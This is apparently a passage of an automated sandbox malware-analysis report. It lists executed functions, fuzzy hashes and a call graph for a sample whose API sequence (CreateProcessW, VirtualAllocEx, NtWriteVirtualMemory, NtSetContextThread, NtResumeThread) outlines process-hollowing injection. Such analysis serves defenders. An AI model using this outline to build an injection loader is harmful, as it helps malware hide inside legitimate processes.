NtResumeThread 16829->16846 16830 508b8c3 16850 508c263 2 API calls 16830->16850 16831 508b985 16851 508a308 VirtualAllocEx 16831->16851 16852 508a300 VirtualAllocEx 16831->16852 16832 508b9c3 16858 508c263 2 API calls 16832->16858 16833 508bb22 16862 508a428 NtWriteVirtualMemory 16833->16862 16863 508a420 NtWriteVirtualMemory 16833->16863 16834 508bb5e 16842 508c263 2 API calls 16834->16842 16835 508bee6 16853 508a579 NtSetContextThread 16835->16853 16854 508a580 NtSetContextThread 16835->16854 16836 508bf79 16843 508a428 NtWriteVirtualMemory 16836->16843 16844 508a420 NtWriteVirtualMemory 16836->16844 16837 508c025 16849 508c263 2 API calls 16837->16849 16838 508c073 16856 508a579 NtSetContextThread 16838->16856 16857 508a580 NtSetContextThread 16838->16857 16839 508bbbd 16839->16835 16860 508a428 NtWriteVirtualMemory 16839->16860 16861 508a420 NtWriteVirtualMemory 16839->16861 16840 508c151 16847 508a208 NtResumeThread 16840->16847 16848 508a200 NtResumeThread 16840->16848 16841 508c204 16841->16638 16842->16839 16843->16837 16844->16837 16845->16830 16846->16830 16847->16841 16848->16841 16849->16838 16850->16831 16851->16832 16852->16832 16853->16836 16854->16836 16856->16840 16857->16840 16858->16833 16859 508c263 2 API calls 16859->16829 16860->16839 16861->16839 16862->16834 16863->16834 16865 5088d88 CreateProcessW 16864->16865 16867 50891ec 16865->16867 16869 508935b 16868->16869 16905 5089c98 16869->16905 16909 5089ca0 16869->16909 16870 50882d3 16870->16713 16874 508a24c NtResumeThread 16873->16874 16876 508a2a3 16874->16876 16876->16692 16878 508a24c NtResumeThread 16877->16878 16880 508a2a3 16878->16880 16880->16692 16882 508a34c VirtualAllocEx 16881->16882 16884 508a3c4 16882->16884 16884->16694 16886 508a306 VirtualAllocEx 16885->16886 16888 508a3c4 16886->16888 16888->16694 16890 508a471 NtWriteVirtualMemory 16889->16890 16892 508a50a 16890->16892 16892->16696 16894 508a426 NtWriteVirtualMemory 16893->16894 16896 508a50a 16894->16896 16896->16696 16898 508a57e NtSetContextThread 16897->16898 16900 508a641 16898->16900 16900->16698 16902 508a5c9 NtSetContextThread 16901->16902 16904 508a641 16902->16904 16904->16698 16906 5089cec NtReadVirtualMemory 16905->16906 16908 5089d64 16906->16908 16908->16870 16910 5089cec NtReadVirtualMemory 16909->16910 16912 5089d64 16910->16912 16912->16870 16914 5088d88 CreateProcessW 16913->16914 16916 50891ec 16914->16916 16918 508b39c 16917->16918 16920 5089c98 NtReadVirtualMemory 16918->16920 16921 5089ca0 NtReadVirtualMemory 16918->16921 16919 508ac2a 16919->16755 16919->16756 16920->16919 16921->16919 16925 5088d88 CreateProcessW 16922->16925 16924 50891ec 16925->16924 16927 508c294 16926->16927 16929 5089c98 NtReadVirtualMemory 16927->16929 16930 5089ca0 NtReadVirtualMemory 16927->16930 16928 508b7c3 16928->16859 16929->16928 16930->16928

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 050820F8 Relevance: 2.0, APIs: 1, Instructions: 462COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ebdfe45f474eb7b80fc888d16f63882a4b715202e946bf7f5f08f0ba52f2a8ee
                                                                                                                                                  • Instruction ID: cebbf92db3fc2bdb11e168d9b431362860c9976bd23b0bb277e7a8bbd8e3265a
                                                                                                                                                  • Opcode Fuzzy Hash: ebdfe45f474eb7b80fc888d16f63882a4b715202e946bf7f5f08f0ba52f2a8ee
                                                                                                                                                  • Instruction Fuzzy Hash: 85125570D053688FEB21EFA8D880BEDBBF1BF49304F1485AAD448AB251DB349985CF55
                                                                                                                                                  Function 0508238B Relevance: 1.9, APIs: 1, Instructions: 442processCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 050891D7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: 33abfa143ef9b93855ba63a2feef4307754defd2bf937d202eec4d6a852355e7
                                                                                                                                                  • Instruction ID: fc775a91938603f465ee281b1048675c723e5a9ebcb9e466f926a619d49081d4
                                                                                                                                                  • Opcode Fuzzy Hash: 33abfa143ef9b93855ba63a2feef4307754defd2bf937d202eec4d6a852355e7
                                                                                                                                                  • Instruction Fuzzy Hash: BF020174E00228CFDB64EFA9D880BADBBF2FF49304F1485A9E459A7250DB309985CF55
                                                                                                                                                  Function 050821A4 Relevance: 1.9, APIs: 1, Instructions: 400processCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 050891D7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: c6dd54b1aea4510b99e8898717cf0a9095c33a572840b68942cacf671bdf7ab9
                                                                                                                                                  • Instruction ID: 8c89b10a8d88d5e00674e25776d3024eef120c2b8a91508264451ea12893167f
                                                                                                                                                  • Opcode Fuzzy Hash: c6dd54b1aea4510b99e8898717cf0a9095c33a572840b68942cacf671bdf7ab9
                                                                                                                                                  • Instruction Fuzzy Hash: AA02EF70E00228CFDB64DFA9D880BADBBF1BF49304F1485A9E459B7251DB30AA85CF51
                                                                                                                                                  Function 050822D7 Relevance: 1.9, APIs: 1, Instructions: 396processCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 050891D7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: 323bd15bcf880dc1d2cb1824b2b093a5ce0e12a866e5fe003d895afaa80b75ca
                                                                                                                                                  • Instruction ID: 3cce55e62f6a82ec19473eccb5251894132deb700de81c3d500159ac0360dcfb
                                                                                                                                                  • Opcode Fuzzy Hash: 323bd15bcf880dc1d2cb1824b2b093a5ce0e12a866e5fe003d895afaa80b75ca
                                                                                                                                                  • Instruction Fuzzy Hash: CC02F070E00228CFDB64EFA9D880BADBBF1BF49304F1485AAE459B7251DB309985CF55
                                                                                                                                                  Function 05088D7C Relevance: 1.9, APIs: 1, Instructions: 387processCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 050891D7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: 7c86e410c50822cd33c57e29b0bf904e8021f4d580eca77f4b0e1d6c08c47905
                                                                                                                                                  • Instruction ID: e5369da0dd0441e8807d1ab24fc4b6694f01f711466d5df0e92e850d86bffb74
                                                                                                                                                  • Opcode Fuzzy Hash: 7c86e410c50822cd33c57e29b0bf904e8021f4d580eca77f4b0e1d6c08c47905
                                                                                                                                                  • Instruction Fuzzy Hash: 28F1F070E00228CFEB64DFA9D881BADBBF1BF49304F1485A9E459B7251DB309A81CF54
                                                                                                                                                  Function 0508238C Relevance: 1.9, APIs: 1, Instructions: 387processCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 050891D7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: 6201afbd0974a4140440c6b13b4611a286246f09de0657e687ffa52de4635ac1
                                                                                                                                                  • Instruction ID: 59ac3815767b5f71f07d638c80b831ce6f106a3aec26b125402d2484404199f6
                                                                                                                                                  • Opcode Fuzzy Hash: 6201afbd0974a4140440c6b13b4611a286246f09de0657e687ffa52de4635ac1
                                                                                                                                                  • Instruction Fuzzy Hash: 7BF1F070E00228CFEB64DFA9D880BADBBF2BF49304F1485A9E459B7251DB309985CF54
                                                                                                                                                  Function 050822EC Relevance: 1.9, APIs: 1, Instructions: 387processCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 050891D7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: 139b2168b43d7b7159153190f44f8c1828bdf34eef354b0c6cf17b4fd4683d71
                                                                                                                                                  • Instruction ID: 99187709cbfc9c7f005304c9e5b8b3b840d04601e555a4991261052ea0f94b1e
                                                                                                                                                  • Opcode Fuzzy Hash: 139b2168b43d7b7159153190f44f8c1828bdf34eef354b0c6cf17b4fd4683d71
                                                                                                                                                  • Instruction Fuzzy Hash: A6F1F070E00228CFEB64DFA9D880BADBBF1BF49304F1485A9E459B7251DB349985CF54
                                                                                                                                                  Function 02980828 Relevance: 1.8, Strings: 1, Instructions: 540COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: p
                                                                                                                                                  • API String ID: 0-2181537457
                                                                                                                                                  • Opcode ID: 7cff8f88dc037ba368eab24f38597a8594199e198ae780eb53f18de14730ab56
                                                                                                                                                  • Instruction ID: dead41b398221d6f2217df7ae9377925aca8e8d218e30bdc59c7d0237d62b221
                                                                                                                                                  • Opcode Fuzzy Hash: 7cff8f88dc037ba368eab24f38597a8594199e198ae780eb53f18de14730ab56
                                                                                                                                                  • Instruction Fuzzy Hash: 3242E470900259CFEB50EF69C584A8EFBB6BF49311F59C199C448AB212DB30DD89CFA5
                                                                                                                                                  Function 0298AA58 Relevance: 1.8, Strings: 1, Instructions: 506COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: p
                                                                                                                                                  • API String ID: 0-2181537457
                                                                                                                                                  • Opcode ID: 1d46a948927dee2c873c6a48400aa7c7b36edac52895c924f9de285318cea255
                                                                                                                                                  • Instruction ID: ae4fc2d0c9abde90b8e234b8a78092e35a1ce37bb90d6b3633b546a456a6cfbf
                                                                                                                                                  • Opcode Fuzzy Hash: 1d46a948927dee2c873c6a48400aa7c7b36edac52895c924f9de285318cea255
                                                                                                                                                  • Instruction Fuzzy Hash: 1932D1B0900219CFEB50DF68C684A8EFBB6BF49315F59C199C448AB252DB30DD85CFA5
                                                                                                                                                  Function 0508A420 Relevance: 1.6, APIs: 1, Instructions: 118nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 0508A4F8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryVirtualWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3527976591-0
                                                                                                                                                  • Opcode ID: d38967c887b71ac63b072666bca1467f78bfd69b06dc93dfd192e399ff0ad252
                                                                                                                                                  • Instruction ID: 06f0e25da12f8cff917849f26d311995f98d3e79637c82921bf81975845e5bf5
                                                                                                                                                  • Opcode Fuzzy Hash: d38967c887b71ac63b072666bca1467f78bfd69b06dc93dfd192e399ff0ad252
                                                                                                                                                  • Instruction Fuzzy Hash: 7B41CCB4D012589FCF10DFA9D984AEEFBF1BB49310F10902AE819B7240D739AA46CF54
                                                                                                                                                  Function 0508A428 Relevance: 1.6, APIs: 1, Instructions: 115nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 0508A4F8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryVirtualWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3527976591-0
                                                                                                                                                  • Opcode ID: 39b209e7ccd76b631dd2a338c6e233c417ada2f1f4d32e0eae4fe3ed04380791
                                                                                                                                                  • Instruction ID: 1cb392588c1577ca30312910cf89fe1e958c4df801e79b68d7cccb309ea832be
                                                                                                                                                  • Opcode Fuzzy Hash: 39b209e7ccd76b631dd2a338c6e233c417ada2f1f4d32e0eae4fe3ed04380791
                                                                                                                                                  • Instruction Fuzzy Hash: 0641BBB4D012589FCF10DFA9D984AEEFBF1BB49310F24902AE815B7240D779AA45CF54
                                                                                                                                                  Function 05089C98 Relevance: 1.6, APIs: 1, Instructions: 108nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 05089D52
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryReadVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2834387570-0
                                                                                                                                                  • Opcode ID: 76c901c52d05df259d03f20c1f433a128a5caed18eca5d7e78e493173ccf5e11
                                                                                                                                                  • Instruction ID: c2357d81cb06a7530a81e1473286aea381bfea603d5969f077228401482a7f15
                                                                                                                                                  • Opcode Fuzzy Hash: 76c901c52d05df259d03f20c1f433a128a5caed18eca5d7e78e493173ccf5e11
                                                                                                                                                  • Instruction Fuzzy Hash: 7A41CDB9D00258DFCF10DFA9D880AEEFBB1BB49310F10942AE815B7240D735A945CF58
                                                                                                                                                  Function 05089CA0 Relevance: 1.6, APIs: 1, Instructions: 106nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 05089D52
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryReadVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2834387570-0
                                                                                                                                                  • Opcode ID: b1bd14eb0cc0c1f75264ca2e8630510324a5d56f80812e87103e947a75a0146b
                                                                                                                                                  • Instruction ID: 5c69f463497b04c09e37f8f3219d9a22180a8459666851678bb6d0dd210937f5
                                                                                                                                                  • Opcode Fuzzy Hash: b1bd14eb0cc0c1f75264ca2e8630510324a5d56f80812e87103e947a75a0146b
                                                                                                                                                  • Instruction Fuzzy Hash: E441BAB8D04258DFCF10DFAAD880AEEFBB1BB49310F10942AE815B7240C735A945CF68
                                                                                                                                                  Function 0508A579 Relevance: 1.6, APIs: 1, Instructions: 96nativethreadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtSetContextThread.NTDLL(?,?), ref: 0508A62F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ContextThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1591575202-0
                                                                                                                                                  • Opcode ID: a81196fd8196ae1690f068168ed6c262f6a08d9cc49337781972048a0b819cd6
                                                                                                                                                  • Instruction ID: 43b8fbadfd8ae80e63951c89a5acb10f15f16eff069264fcf3f443af76b00518
                                                                                                                                                  • Opcode Fuzzy Hash: a81196fd8196ae1690f068168ed6c262f6a08d9cc49337781972048a0b819cd6
                                                                                                                                                  • Instruction Fuzzy Hash: 6141BCB4D012589FDB10DFAAD985AEEFBF1BB48320F14802AE415B7240C739A946CF94
                                                                                                                                                  Function 0508A580 Relevance: 1.6, APIs: 1, Instructions: 94nativethreadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtSetContextThread.NTDLL(?,?), ref: 0508A62F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ContextThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1591575202-0
                                                                                                                                                  • Opcode ID: 3590918027d9dde087dd75f8776f7d5db14dbf74b1f2701a697b64bd5e876a4f
                                                                                                                                                  • Instruction ID: 259fd4170435c98420b396a94bad135582198f8a8933902060566da8a253697d
                                                                                                                                                  • Opcode Fuzzy Hash: 3590918027d9dde087dd75f8776f7d5db14dbf74b1f2701a697b64bd5e876a4f
                                                                                                                                                  • Instruction Fuzzy Hash: 0331BBB4D012589FDB10DFAAD885AEEFBF1BB48320F14802AE415B7240C738A945CF54
                                                                                                                                                  Function 0508A200 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtResumeThread.NTDLL(?,?), ref: 0508A291
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                  • Opcode ID: 15c6e789a15b20bf015acadf37af16c939d61dd9268eaeeb526c0e72c9586b65
                                                                                                                                                  • Instruction ID: 3a3c0170497a42221eb9714eb043e444682f00034b3c2d9ebd5ae1a1327df820
                                                                                                                                                  • Opcode Fuzzy Hash: 15c6e789a15b20bf015acadf37af16c939d61dd9268eaeeb526c0e72c9586b65
                                                                                                                                                  • Instruction Fuzzy Hash: 6A31AAB9D012189FCB20DFA9E981A9EFBF1FB59310F14942AE815B7240D735A942CF94
                                                                                                                                                  Function 0508A208 Relevance: 1.6, APIs: 1, Instructions: 80nativethreadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtResumeThread.NTDLL(?,?), ref: 0508A291
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1529714409.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_5080000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                  • Opcode ID: 25ee435e6548875a25ae449a2f64bcfc3b1e50d777b99469b4c4011cb5239bd8
                                                                                                                                                  • Instruction ID: e875c89bddf23cfdc7a2e6d495da627607fe6cd2c85dca7497d5c6bb52e36338
                                                                                                                                                  • Opcode Fuzzy Hash: 25ee435e6548875a25ae449a2f64bcfc3b1e50d777b99469b4c4011cb5239bd8
                                                                                                                                                  • Instruction Fuzzy Hash: E931BBB4D012189FCB20DFA9D981A9EFBF1BB49310F10942AE815B7340C735A942CF94
                                                                                                                                                  Function 0298E71F Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 3/^
                                                                                                                                                  • API String ID: 0-2478644769
                                                                                                                                                  • Opcode ID: 6ec3bb15075aabb64ddf9fe2841b79199c4ba2598528d027d3ce0aad90f55a0c
                                                                                                                                                  • Instruction ID: 55554d9b60d16306a5c834077cc6be02a0ce701728dcd47fe8d56ee42c3da0ea
                                                                                                                                                  • Opcode Fuzzy Hash: 6ec3bb15075aabb64ddf9fe2841b79199c4ba2598528d027d3ce0aad90f55a0c
                                                                                                                                                  • Instruction Fuzzy Hash: 6EE10974E042198FDB14DFA9C590AAEFBB2FF89304F288169E454AB355D731AD42CF60
                                                                                                                                                  Function 02980869 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: p
                                                                                                                                                  • API String ID: 0-2181537457
                                                                                                                                                  • Opcode ID: a203cb12fee0d238f2a0e7097d3488d769437026ef36956f0286b145c88c0908
                                                                                                                                                  • Instruction ID: 39e3890b798c3ab4cebeead972a1b74258199774df2b9dc4638667c468867fa5
                                                                                                                                                  • Opcode Fuzzy Hash: a203cb12fee0d238f2a0e7097d3488d769437026ef36956f0286b145c88c0908
                                                                                                                                                  • Instruction Fuzzy Hash: 9051F6B1E002188FEB58DF6AC85179EBBB3BF89300F14C0A9C54DAB255DB305A85CF51
                                                                                                                                                  Function 0298AAB0 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: p
                                                                                                                                                  • API String ID: 0-2181537457
                                                                                                                                                  • Opcode ID: 4a144a58c97c38c5f8120584b6765a30518dcdafcfb7bc790c59473fd2de78ca
                                                                                                                                                  • Instruction ID: c1f9b9b2447a99c07e3b4bc10c056c14fe5bb853933cf73900c1151c15febc61
                                                                                                                                                  • Opcode Fuzzy Hash: 4a144a58c97c38c5f8120584b6765a30518dcdafcfb7bc790c59473fd2de78ca
                                                                                                                                                  • Instruction Fuzzy Hash: 4751EAB1E002188FEB58DF6AC85179EBBB3BFC9300F14C0A9D54DAB255DB345A858F51
                                                                                                                                                  Function 02984458 Relevance: .6, Instructions: 560COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 76b88a09511b2a7d39877c7a5068603f76342efed1ea0ff3e3381b24ef18fa09
                                                                                                                                                  • Instruction ID: e96c410143b92e814273a3793409ca4f735d3feef5685e5276e5eea74890a3e6
                                                                                                                                                  • Opcode Fuzzy Hash: 76b88a09511b2a7d39877c7a5068603f76342efed1ea0ff3e3381b24ef18fa09
                                                                                                                                                  • Instruction Fuzzy Hash: 5B42D57090025A8FDB54DFA8CA84A9EFBF6FF48205F19D1A5D048AB255DB30DD81CF94
                                                                                                                                                  Function 02981B91 Relevance: .5, Instructions: 514COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.1511651764.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_2980000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0bb3a0a2e7f43844b68483bd7de2b230a5659441fa96b961d97328e83685bae9
                                                                                                                                                  • Instruction ID: 7e258d43f231aada4acbf5ee0f87ae1b4fc90da03e6696bf6066daa295ca3b72
                                                                                                                                                  • Opcode Fuzzy Hash: 0bb3a0a2e7f43844b68483bd7de2b230a5659441fa96b961d97328e83685bae9
                                                                                                                                                  • Instruction Fuzzy Hash: CB429D74E01229CFDB64DFA9C984B9DBBB2BF48310F1485A9E909A7355D730AE81CF50
                                                                                                                                                  Function 02985C38 Relevance: .5, Instructions: 511COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
